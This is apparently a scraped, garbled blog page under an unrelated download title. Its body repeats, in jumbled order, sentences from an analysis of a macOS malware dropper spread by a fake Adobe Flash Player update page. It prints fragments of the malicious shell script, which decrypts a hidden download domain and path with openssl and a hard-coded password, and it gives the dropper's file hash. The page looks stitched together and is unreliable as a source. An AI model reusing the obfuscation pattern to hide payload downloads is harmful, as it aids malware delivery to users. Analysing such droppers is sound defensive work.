Echo Storm instal the new version for mac12/10/2023 ![]() Here is the script content:Ģ: dlDomain="$(echo "U2FsdGVkX1/fbXNpkXRL0cKWwNEaD2rneZpajkkAapbX8Uif/MGaZ6B/u1oEWglI" | openssl enc -aes-256-cbc -a -salt -pass pass:mmpass -d -A)"ģ: dlPath="$(echo "U2FsdGVkX1/I3nNeY0LjXYTpVzpZfUfhQg4pLf6/CW8=" | openssl enc -aes-256-cbc -a -salt -pass pass:mmpass -d -A)"Ĥ: dir="$" ![]() ![]() This image, once mounted, entices the user to execute a script called ‘mand’. All links redirect to the same URL which downloads a first file called ‘Adobe Flash Player.dmg’ (SHA256:6f3ff669d3de26aac6ac4a5a7e902476df710f8c5dd9295cf5918abeebf8a638) with a VT score of 1/56!. The quality of the fake page is quite good. The file was delivered through a fake Flash update webpage: Today, I found another example of malicious shell script embedded in an Apple. Yesterday, I wrote a diary about a nice obfuscated shell script.
0 Comments
Leave a Reply.AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |